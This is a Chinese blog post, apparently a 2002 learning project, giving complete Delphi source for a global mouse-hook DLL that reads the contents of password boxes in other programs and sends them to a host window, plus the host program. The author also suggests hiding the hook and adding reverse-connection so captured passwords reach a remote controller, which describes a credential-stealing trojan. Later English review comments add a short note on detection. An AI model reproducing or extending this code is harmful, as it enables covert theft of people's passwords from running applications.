Windows文本框星号密码查看器
Windows文本框星號密碼查看器
本人2002的學習作品
作者:成曉旭
1、 設計原理:注冊一個系統級鼠標掛鉤,通過監測系統鼠標所在的Windows窗口來獲取密碼;成功獲取密碼之后,發送自定義的Windows系統消息到宿主程序。
2、 Hook動態鏈接庫設計原理:采用Windows Hook技術[鼠標掛鉤],切入遠程進程內部,并監測當前系統鼠標所在位置的窗口句柄(通過Windows API WindowFromPoint()),獲取窗口句柄之后,判斷當前窗口是否為文本框,并進一步判斷是否為密碼框,當發現是密碼輸入框時,向此窗口發送WM_GETTEXT消息,獲取密碼。成功獲取密碼之后,發送自定義的WM_COPYDATA消息到宿主程序;
具體實現步驟簡介:
1.? 設置系統鼠標掛鉤:
??????? hkMouseHook := SetWindowsHookEx(WH_MOUSE,@CXX_MouseHookProc,hInstance,0);
2.? 注銷系統鼠標掛鉤:
??????? UnHookWindowsHookEx(hkMouseHook);
3.  監測當前窗口及窗口風格判斷:
??????? MousePos := pMhs.pt;
??? wnd := WindowFromPoint(pmhs.pt);
??? style := GetWindowLong(wnd,GWL_STYLE);
??? if (style and ES_PASSWORD) = ES_PASSWORD then
??? begin
??? ??????? //發現密碼窗口
??? end;
4.? 向密碼框獲取密碼串:
??????? SendMessage(wnd,WM_GETTEXT,256,Integer(@MouseTitle[0]));
5.? 發送自定義消息到宿主程序:
????????????? GetMem(pmi,sizeof(TMouseInfo));
??????? pmi.MouseX := pt.X;
??????? pmi.MouseY := pt.Y;
??????? pmi.MouseTitle := pwd;
??????? GetMem(pcds,sizeof(TCopyDataStruct));
??????? pcds.dwData := 9910;
??????? pcds.cbData := sizeof(TMouseInfo);
??????? pcds.lpData := pmi;
??????? SendMessage(hDec,WM_COPYDATA,0,LPARAM(pcds));
3、 宿主程序設計原理:我的宿主程序是自己學習Windows SDK開發時的作品,采用純SDK實現。SDK的編程不用廢話了吧。在這個工具程序中,只需要在系統消息處理方法中,增加一個對WM_COPYDATA的攔截及處理過程就可以了。
case uMsg of
??? WM_COPYDATA:
??? begin
??????? CXX_ReceiveCopyData(uMsg);
??? end;
??????? ……
end;
4、? 應用技術提點:這個是本人在2002年學習Microsoft Windows SDK編程技術時的學習作品。當然,有興趣的話,你完全可以將其Hook進一步進行隱藏,并為其增加“端口反彈”或者“半連接”功能,宿主程序可以是自己的遠程XXXXXX,哈哈,這樣發布出來的話,想知道的東西就多了……
5、 完整源碼代碼:
1.? Hook鼠標掛鉤部分:
??
...{?????產品名稱:?????Windows 密碼工具[Window98/NT/2000/XP]
?????功能描述:?????截取Windows密碼編輯框中的密碼串
????????????????????采用純粹的SDK開發
????????????????????能捕捉windows98/NT/2000/XP的密碼框中的"*"密碼
?????開發平臺:?????Windows2000?+?Delphi6?+?MSDN?+?SDK
?????開發者:???????成曉旭
?????版權所有:?????成曉旭
?????模塊設計者:???成曉旭
?????設計思路:?????采用Windows?Hook技術[鼠標掛鉤],切入遠程進程內部,
????????????????????再發送WM_GETTEXT消息截取密碼,最后用SendMessage發送
????????????????????WM_COPYDATA消息自定義的密碼信息結構體到目標窗口,以
????????????????????顯示或處理Hook?DLL所截取的遠程進程的密碼.
?????開始時間:?????2002年3月4日
?????完成時間:?????2002年5月24日[最終實現]
?????備????注:?????此工具是本人在2002年開發的第二個軟件
????????????????????本工具在2000年6月份左右曾實現過一個Windows98下的
????????????????????密碼截取工具,兩年以來,我一直沒有放棄過實現Windows
????????????????????操作系統下的所有密碼的截取,如此,終于實現了兩年以來
????????????????????未曾實現的截取WindowsNT系列的密碼.[2002/05/24]
????????????????????以后的路還很長:WindowNT系列的當前用戶登錄密碼、
????????????????????內存長駐的其它密碼等等.
}
unit?MouseHook;
interface
uses
????Messages,Windows;//,SysUtils;
var
    // Hook handle returned by SetWindowsHookEx in SetupHook; 0 means no hook is installed.
    hkMouseHook: HHook;
    // Exit-procedure pointer that AutoUnInstallHook assigns back to ExitProc.
    // Nothing in this unit, as shown, stores a value into it.
    ProcSafelyExit: Pointer;
    // Not assigned in this unit as shown; the only RegisterWindowMessage call
    // that would set it (in DllEntryProc) is commented out.
    uCXXMsg: UINT;

    // DLL attach/detach notification entry; its body is currently disabled.
    procedure DllEntryProc(ul_reason_for_call: DWORD);
    // Installs (fSet = True) or removes (fSet = False) the WH_MOUSE hook.
    procedure SetupHook(fSet: boolean); stdcall; export;
    // Hook callback passed to SetWindowsHookEx.
    function CXX_MouseHookProc(iCode: integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export;
    // Removes the hook if still installed and restores ExitProc.
    procedure AutoUnInstallHook(); far;
implementation
uses?DataStruct;
{
  Forwards one captured string, together with the mouse position, to the
  receiving window through WM_COPYDATA.

  Parameters:
    pt  - mouse position, copied into TMouseInfo.MouseX / MouseY.
    pwd - captured text, copied into TMouseInfo.MouseTitle.

  The receiver is located only by its window title. If no window with that
  title exists, a message box is shown and nothing is sent.

  NOTE(review): this is called from CXX_MouseHookProc, so the message box and
  the synchronous SendMessage both run inside whichever process the hook fired
  in. A title-only FindWindow lookup also gives no assurance about which
  process actually receives the data.
}
procedure CXX_SendCopyData(pt: TPoint; pwd: TMTitle);
var
    pCopy: PCopyDataStruct;
    pInfo: PMouseInfo;
    hReceiver: THandle;
begin
    hReceiver := FindWindow(nil, 'WM_COPYDATA接收端');
    if hReceiver <> 0 then
    begin
        // NOTE(review): both allocations sit inside the try, so if either GetMem
        // raises, the finally block calls FreeMem on a pointer that was never assigned.
        try
            GetMem(pInfo, SizeOf(TMouseInfo));
            pInfo^.MouseX := pt.X;
            pInfo^.MouseY := pt.Y;
            pInfo^.MouseTitle := pwd;

            GetMem(pCopy, SizeOf(TCopyDataStruct));
            pCopy^.dwData := 9910;                  // tag value identifying this payload
            pCopy^.cbData := SizeOf(TMouseInfo);
            pCopy^.lpData := pInfo;

            // SendMessage returns only after the receiver has handled the message,
            // so the buffers are released afterwards in the finally block.
            SendMessage(hReceiver, WM_COPYDATA, 0, LPARAM(pCopy));
        finally
            FreeMem(pInfo);
            FreeMem(pCopy);
        end;
    end
    else
        MessageBox(0, '數據接收窗口沒有找到,程序拒絕發送WM_COPYDATA消息!', '提示', MB_OK or MB_ICONWARNING);
end;
{
  WH_MOUSE hook callback.

  For every HC_ACTION notification it looks up the window under the mouse
  position, tests the ES_PASSWORD bit of that window's style, and if the bit is
  set reads the window text with WM_GETTEXT and hands it to CXX_SendCopyData.
  The notification is always passed on with CallNextHookEx.

  Parameters follow the hook-procedure convention: iCode is the hook code,
  lParam points to a MOUSEHOOKSTRUCT, wParam is forwarded unchanged.

  The design note in the unit header says the hook is used so that this code
  runs inside the target process. wParam is not inspected, so the check runs on
  every mouse notification, not only on clicks.

  Defensive note: a global hook of this kind appears as an unexpected DLL
  loaded into GUI processes, which is what endpoint tooling looks for. On
  Windows Vista and later, UIPI stops a lower-integrity process from hooking
  higher-integrity ones.
}
function CXX_MouseHookProc(iCode: integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export;
var
    pHookInfo: PMOUSEHOOKSTRUCT;
    hTarget: HWND;
    dwStyle: LongInt;
    ptMouse: TPoint;
    szText: TMTitle;
begin
    if iCode = HC_ACTION then
    begin
        // NOTE(review): 255 bytes are cleared here but 256 is passed to WM_GETTEXT
        // below as the buffer size. TMTitle is declared in DataStruct (not shown);
        // confirm it holds at least 256 bytes.
        FillChar(szText, 255, 0);
        pHookInfo := PMOUSEHOOKSTRUCT(lParam);
        ptMouse := pHookInfo^.pt;
        hTarget := WindowFromPoint(pHookInfo^.pt);
        dwStyle := GetWindowLong(hTarget, GWL_STYLE);
        // ES_PASSWORD is a single style bit, so a non-zero mask result means it is set.
        if (dwStyle and ES_PASSWORD) <> 0 then
        begin
            SendMessage(hTarget, WM_GETTEXT, 256, Integer(@szText[0]));
            // Forward the captured text and the mouse position.
            CXX_SendCopyData(ptMouse, szText);
        end;
    end;
    Result := CallNextHookEx(hkMouseHook, iCode, wParam, lParam);
end;
{
  Installs or removes the mouse hook.

  fSet = True  : calls SetWindowsHookEx(WH_MOUSE, ...) unless a hook handle is
                 already stored in hkMouseHook.
  fSet = False : unhooks and resets hkMouseHook to 0 if a hook is installed.

  The last SetWindowsHookEx argument (thread id) is 0 and the module handle is
  this DLL's hInstance, which requests a hook that is not limited to a single
  thread. The return value of SetWindowsHookEx is stored but not checked here.
}
procedure SetupHook(fSet: boolean); stdcall; export;
begin
    if fSet then
    begin
        // Only install once; an existing handle is left untouched.
        if hkMouseHook = 0 then
            hkMouseHook := SetWindowsHookEx(WH_MOUSE, @CXX_MouseHookProc, hInstance, 0);
    end
    else if hkMouseHook <> 0 then
    begin
        UnHookWindowsHookEx(hkMouseHook);
        hkMouseHook := 0;
    end;
end;
{
  DLL attach/detach notification handler.

  The body is intentionally empty: the original attach/detach message boxes and
  the RegisterWindowMessage call are kept below as disabled code only.
}
procedure DllEntryProc(ul_reason_for_call: DWORD);
begin
    // if ul_reason_for_call = DLL_PROCESS_ATTACH then
    // begin
    //     MessageBox(0,'DLL_PROCESS_ATTACH','MouseDll Hint',MB_OK or MB_ICONINFORMATION);
    //     //uCXXMsg := RegisterWindowMessage(SELF_MESSAGE_NAME);
    // end
    // else if ul_reason_for_call = DLL_PROCESS_DETACH then
    // begin
    //     MessageBox(0,'DLL_PROCESS_DETACH','MouseDll Hint',MB_OK or MB_ICONINFORMATION);
    // end;
end;
{
  Exit-time cleanup: restores ExitProc from ProcSafelyExit and removes the
  mouse hook if one is still installed.
  NOTE(review): nothing in this unit, as shown, assigns ProcSafelyExit or
  registers this procedure as ExitProc; confirm where that happens.
}
procedure AutoUnInstallHook();
begin
    // The two steps are independent of each other.
    ExitProc := ProcSafelyExit;
    if hkMouseHook <> 0 then
        SetupHook(False);
end;
end.
?
?
2.? 宿主程序部分:
?
此程序中,還有關于Windows程序資源加載以及窗口背景繪制等技術的演示。
?
...{?????產品名稱:?????Windows 密碼工具
?????功能描述:?????截取Windows密碼編輯框中的密碼串
????????????????????采用純粹的SDK開發
?????開發平臺:?????Windows2000?+?Delphi6?+?MSDN?+?SDK
?????開發者:???????成曉旭
?????版權所有:?????成曉旭
?????模塊設計者:???成曉旭
?????開始時間:?????2002年3月4日
?????完成時間:?????2002年3月4日
?????修改時間1:????2002年3月4日
?????備????注:?????此工具是本人在2002年開發的第二個軟件,
}
program?MouseExe;
uses
??Windows,
??SysUtils,
??Messages,
??Tie_In_MHook?in?'Tie_In_MHook.pas',
??DataStruct?in?'DataStruct.pas';
...{$R?MouseExe.res}
const
    CXX_WND_CLASS = 'DC_Password';                       // main window class name
    CXX_WND_CAPTION = 'Window2000/XP 密碼捕捉工具';       // main window caption
    // Hard-coded string; not referenced elsewhere in the listing shown.
    CXX_PASSKEY = 'chenxiaoxu';
    MOUSE_MOVE_TIMER = WM_USER + 9910;                   // timer id used by CXX_SetProgramTimer
    SELF_MESSAGE_NAME = 'CXX_Test_Window_Message';       // name passed to RegisterWindowMessage
var
    hWndMain: LongWord;     // main window handle
    hBtnCheck: LongWord;    // "send" button handle
    hBtnClose: LongWord;    // "close" button handle
    hStcPos: LongWord;      // static label: mouse position
    hStcTitle: LongWord;    // static label: window title
    hEdtPos: LongWord;      // edit box: current mouse position
    hEdtTitle: LongWord;    // edit box: retrieved window title
    hInstMain: integer;     // program instance handle
    hBGBmp: HBITMAP;        // main window background bitmap handle
    hCur: HICON;            // cursor loaded in CXX_InitInstance
    uCXXMsg: UINT;          // id returned by RegisterWindowMessage in WM_CREATE
{
  Test sender: builds a TMouseInfo with fixed values (10, 50, 'chenxiaoxu') and
  sends it by WM_COPYDATA to the window titled 'WM_COPYDATA接收端'.

  If no such window exists, a warning box is shown and nothing is sent.
  The receiver is identified by window title only.
}
procedure CXX_SendCopyData();
var
    pCopy: PCopyDataStruct;
    pInfo: PMouseInfo;
    hReceiver: THandle;
begin
    hReceiver := FindWindow(nil, 'WM_COPYDATA接收端');
    if hReceiver = 0 then
    begin
        MessageBox(hWndMain, '數據接收窗口沒有找到,程序拒絕發送WM_COPYDATA消息!', '提示', MB_OK or MB_ICONWARNING);
        Exit;
    end;

    // Payload with fixed sample values.
    GetMem(pInfo, SizeOf(TMouseInfo));
    pInfo^.MouseX := 10;
    pInfo^.MouseY := 50;
    pInfo^.MouseTitle := 'chenxiaoxu';

    GetMem(pCopy, SizeOf(TCopyDataStruct));
    pCopy^.dwData := 9910;
    pCopy^.cbData := SizeOf(TMouseInfo);
    pCopy^.lpData := pInfo;

    // Synchronous send; the buffers are released once it returns.
    // No try/finally protects them (the original had it commented out).
    SendMessage(hReceiver, WM_COPYDATA, hWndMain, LPARAM(pCopy));

    FreeMem(pInfo);
    FreeMem(pCopy);
end;
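{
  Handles a received WM_COPYDATA message.

  Parameters:
    Msg - the message; Msg.LParam is interpreted as a pointer to a
          COPYDATASTRUCT whose lpData points to a TMouseInfo.

  Any process that can reach this window can send WM_COPYDATA, so the payload
  is validated before lpData is reinterpreted: the tag must be 9910 (the value
  the sender sets) and the block must be at least SizeOf(TMouseInfo) bytes.
  Messages that fail the check are ignored.

  As in the original, the coordinates are only formatted into a local string
  that is not used afterwards.
}
procedure CXX_ReceiveCopyData(Msg: TMessage);
var
    pCopy: PCopyDataStruct;
    pInfo: PMouseInfo;
    str: string;
begin
    pCopy := PCopyDataStruct(Msg.LParam);
    if pCopy = nil then
        Exit;
    // Reject foreign or truncated payloads instead of casting them blindly.
    if (pCopy^.dwData <> 9910) or
       (pCopy^.lpData = nil) or
       (pCopy^.cbData < SizeOf(TMouseInfo)) then
        Exit;

    pInfo := PMouseInfo(pCopy^.lpData);
    str := IntToStr(pInfo^.MouseX);
    str := str + IntToStr(pInfo^.MouseY);
end;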
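{
  Tiles a bitmap over the client area of the main window.

  Parameters:
    fdc     - destination device context.
    fBitmap - bitmap to tile; 0 means "not loaded" and nothing is drawn.

  Returns True when the bitmap was drawn and the memory DC was deleted, and
  False otherwise.

  Changes from the original:
    - the memory DC is always deleted, including on the early-exit paths that
      previously leaked it;
    - the SelectObject result is compared with 0 instead of being cast to
      Boolean, which looks only at the low byte of the handle;
    - the previously selected object is restored before the DC is deleted;
    - a bitmap with a non-positive width or height is rejected, because the
      tiling loops would never advance.
}
function CXX_DrawBGBitmap(fdc: HDC; fBitmap: HBitmap): boolean;
var
    hdcMem: HDC;
    hOldObj: HGDIOBJ;
    rect: TRect;
    bmp: Bitmap;
    x, y: integer;
begin
    Result := False;
    // Background bitmap not loaded yet: nothing to draw.
    if fBitmap = 0 then Exit;
    // Area to cover.
    GetClientRect(hWndMain, rect);
    // Memory DC compatible with the destination.
    hdcMem := CreateCompatibleDC(fdc);
    if hdcMem = 0 then Exit;
    try
        // Read the bitmap dimensions.
        if GetObject(fBitmap, SizeOf(bmp), @bmp) = 0 then Exit;
        if (bmp.bmWidth <= 0) or (bmp.bmHeight <= 0) then Exit;
        // Select the bitmap into the memory DC, remembering the previous object.
        hOldObj := SelectObject(hdcMem, fBitmap);
        if hOldObj = 0 then Exit;
        try
            // Tile column by column, row by row.
            x := 0;
            while x <= rect.Right - rect.Left do
            begin
                y := 0;
                while y <= rect.Bottom - rect.Top do
                begin
                    BitBlt(fdc, x, y, bmp.bmWidth, bmp.bmHeight, hdcMem, 0, 0, SRCCOPY);
                    y := y + bmp.bmHeight;
                end;
                x := x + bmp.bmWidth;
            end;
        finally
            SelectObject(hdcMem, hOldObj);
        end;
        Result := True;
    finally
        // Runs on every path; a failed delete turns the result into False.
        if not DeleteDC(hdcMem) then
            Result := False;
    end;
end;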
{
  CXX_SetWinCaption: sets the text of a window or control.
  Parameters:
    hWnd    - handle of the window or control
    pchText - new text
  Implemented by sending WM_SETTEXT.
}
procedure CXX_SetWinCaption(hWnd: hWND; pchText: PChar);
begin
    SendMessage(hWnd, WM_SETTEXT, 0, LPARAM(pchText));
end;
{
  CXX_GetWinCaption: reads the text of a window or control.
  Parameters:
    hWnd    - handle of the window or control
    pchText - caller-supplied buffer that receives the text
  Implemented by sending WM_GETTEXT with a fixed buffer size of 255.
  NOTE(review): the buffer length is not passed in, so the caller must supply
  at least 255 characters. A smaller buffer can be overrun.
}
procedure CXX_GetWinCaption(hWnd: hWND; pchText: PChar);
begin
    SendMessage(hWnd, WM_GETTEXT, 255, LPARAM(pchText));
end;
{
  Timer callback placeholder; the body does nothing.
  It is not registered anywhere in the listing shown: CXX_SetProgramTimer
  passes nil as the timer procedure.
}
procedure CXX_MouseMoveTimerProc(hWin: HWND; uMsg: UINT; idEvent: UINT; dwTime: DWORD);
begin
    // Disabled: MessageBox(hWin,'系統時間','提示',0);
end;
{
  Starts or stops the MOUSE_MOVE_TIMER timer on the main window.

  fSetTimer = True  : starts a 100 ms timer with no callback, so WM_TIMER is
                      delivered to the window.
  fSetTimer = False : kills the timer.

  Returns True when the underlying SetTimer / KillTimer call succeeded.
}
function CXX_SetProgramTimer(fSetTimer: boolean): boolean;
begin
    if fSetTimer then
        Result := SetTimer(hWndMain, MOUSE_MOVE_TIMER, 100, nil) <> 0
    else
        Result := KillTimer(hWndMain, MOUSE_MOVE_TIMER);
end;
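{
  Window procedure of the main window.

  Handled messages:
    WM_COPYDATA      - passed to CXX_ReceiveCopyData.
    WM_CREATE        - registers SELF_MESSAGE_NAME and stores the id in uCXXMsg.
    WM_RBUTTONDBLCLK - posts a quit message.
    WM_COMMAND       - the close button asks for confirmation and quits; the
                       check button calls CXX_SendCopyData (the SetupHook call
                       is commented out in this listing).
    WM_PAINT         - tiles the background bitmap.
    WM_DESTROY       - stops the timer and halts the program.
  Every message is finally passed to DefWindowProc.

  Change from the original: WM_PAINT now pairs BeginPaint with EndPaint. The
  original never called EndPaint, so the paint DC was not released.

  NOTE(review): uMsg is declared as TMessage but is used as a message id (in
  the case statement and in DefWindowProc) and is also passed to
  CXX_ReceiveCopyData. The declaration is kept exactly as posted; confirm the
  intended type against the real project.
}
function CXX_MainWindowProc(hWnd: DWord; uMsg: TMessage; wParam, lParam: DWord): LRESULT; stdcall;
var
    dc: HDC;
    ps: PAINTSTRUCT;
begin
    // Disabled handling of the registered custom message:
    // if uMsg = uCXXMsg then
    // begin
    //     MessageBox(hWnd,'自定義消息來了!!!','Hint',0);
    //     MessageBox(hWnd,PChar(lParam),'消息內容',0);
    // end;
    case uMsg of
    WM_COPYDATA:
    begin
        CXX_ReceiveCopyData(uMsg);
    end;
    WM_CREATE:
    begin
        uCXXMsg := RegisterWindowMessage(SELF_MESSAGE_NAME);
    end;
    WM_RBUTTONDBLCLK:   //$0206
        PostQuitMessage(0);
    WM_COMMAND:         //$0111
    begin
        if lParam = hBtnClose then
        begin
            if MessageBox(hWnd, PChar('確定要退出【' + CXX_WND_CAPTION + '】嗎?'), '確認', MB_YESNO or MB_ICONQUESTION) = IDYES then
                PostQuitMessage(0);
        end
        else if lParam = hBtnCheck then
        begin
            //CXX_SetProgramTimer(True);
            //PostMessage(HWND_BROADCAST,uCXXMsg,0,0);
            //SetupHook(True);
            CXX_SendCopyData();
        end;
    end;
    WM_PAINT:
    begin
        dc := BeginPaint(hWnd, ps);
        try
            if not CXX_DrawBGBitmap(dc, hBGBmp) then
                MessageBox(hWnd, '繪制主窗口背景失敗呢!', '提示', MB_OK or MB_ICONWARNING);
        finally
            // Release the paint DC and validate the update region.
            EndPaint(hWnd, ps);
        end;
    end;
    WM_DESTROY:
    begin
        CXX_SetProgramTimer(false);
        Halt;   //$0002:
    end;
    end;    //End of Case
    Result := DefWindowProc(hWnd, uMsg, wParam, lParam);
end;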
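{
  Loads the program resources and registers the main window class.

  Steps:
    1. stores hInstance in hInstMain;
    2. loads the 'HANDLE' cursor resource and makes it the current cursor, or
       shows a warning if it cannot be loaded;
    3. loads the 'BACKBMP' bitmap resource into hBGBmp, or shows a warning;
    4. fills a TWndClass and registers it.

  Returns True when the window class was registered.

  Changes from the original:
    - the cursor-load failure showed the background-bitmap message (copy/paste
      slip); it now reports the cursor;
    - the RegisterClassA result is compared with 0 instead of being cast to
      Boolean, which looks only at the low byte of the returned atom.

  NOTE(review): hbrBackground is set to CTLCOLOR_EDIT, which is a control-colour
  constant rather than a brush handle. It is kept as posted; presumably a
  system-colour index was intended - confirm.
}
function CXX_InitInstance(): boolean;
var
    wndClass: TWndClass;
begin
    hInstMain := hInstance;

    hCur := LoadCursor(hInstMain, 'HANDLE');
    if hCur = 0 then
        MessageBox(hWndMain, '加載鼠標光標失敗!!!', '提示', MB_OK or MB_ICONWARNING)
    else
        SetCursor(hCur);

    hBGBmp := LoadBitmap(hInstMain, 'BACKBMP');
    if hBGBmp = 0 then
        MessageBox(hWndMain, '加載主窗口背景圖片失敗!!!', '提示', MB_OK or MB_ICONWARNING);

    wndClass.cbClsExtra := 0;
    wndClass.cbWndExtra := 0;
    wndClass.hInstance := hInstMain;
    wndClass.hIcon := 0;
    wndClass.hCursor := LoadCursor(0, IDC_HAND);
    wndClass.hbrBackground := CTLCOLOR_EDIT;
    wndClass.lpfnWndProc := @CXX_MainWindowProc;
    wndClass.lpszClassName := CXX_WND_CLASS;
    wndClass.lpszMenuName := nil;
    wndClass.style := CS_DBLCLKS;    // needed to receive double-click messages

    // RegisterClassA returns 0 on failure and a non-zero atom on success.
    Result := RegisterClassA(wndClass) <> 0;
end;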
{
  Program body: registers the window class, creates the main window and its
  six child controls, then runs the message loop.

  Returns without creating anything if CXX_InitInstance fails.

  NOTE(review): the CreateWindowEx results are not checked. GetMessage can also
  return -1 on error, which a plain `while GetMessage(...) do` loop treats as
  "keep going".
}
procedure CXX_RunMainProgram();
var
    msgCur: TMsg;

    // Creates one visible child control of the main window.
    function MakeChild(exStyle: DWORD; cls, caption: PChar; x, y, w, h: Integer): LongWord;
    begin
        Result := CreateWindowEx(exStyle, cls, caption,
                                 WS_VISIBLE or WS_CHILD,
                                 x, y, w, h,
                                 hWndMain, 0, hInstMain, nil);
    end;

begin
    if not CXX_InitInstance() then
        Exit;

    // Top-most main window, 320 x 150 at the screen origin.
    hWndMain := CreateWindowEx(WS_EX_CLIENTEDGE or WS_EX_TOPMOST,
                               CXX_WND_CLASS, CXX_WND_CAPTION,
                               WS_VISIBLE or WS_SYSMENU or WS_MINIMIZEBOX,
                               0, 0, 320, 150, 0, 0, hInstMain, nil);

    // Row 1: mouse position label and edit box.
    hStcPos := MakeChild(0, 'static', '鼠標位置:', 5, 10, 80, 20);
    hEdtPos := MakeChild(WS_EX_CLIENTEDGE, 'Edit', '', 100, 10, 200, 20);
    // Row 2: captured-text label and edit box.
    hStcTitle := MakeChild(0, 'static', '獲取密碼:', 5, 50, 80, 20);
    hEdtTitle := MakeChild(WS_EX_CLIENTEDGE, 'Edit', '', 100, 50, 200, 20);
    // Row 3: the two buttons.
    hBtnCheck := MakeChild(WS_EX_STATICEDGE or WS_EX_CLIENTEDGE, 'Button', '發送消息', 10, 85, 100, 30);
    hBtnClose := MakeChild(WS_EX_STATICEDGE or WS_EX_CLIENTEDGE, 'Button', '退出程序', 180, 85, 100, 30);

    // Message loop, filtered to the main window.
    while GetMessage(msgCur, hWndMain, 0, 0) do
    begin
        TranslateMessage(msgCur);
        DispatchMessage(msgCur);
    end;
end;
// Program entry point: everything happens in CXX_RunMainProgram.
begin
    CXX_RunMainProgram;
end.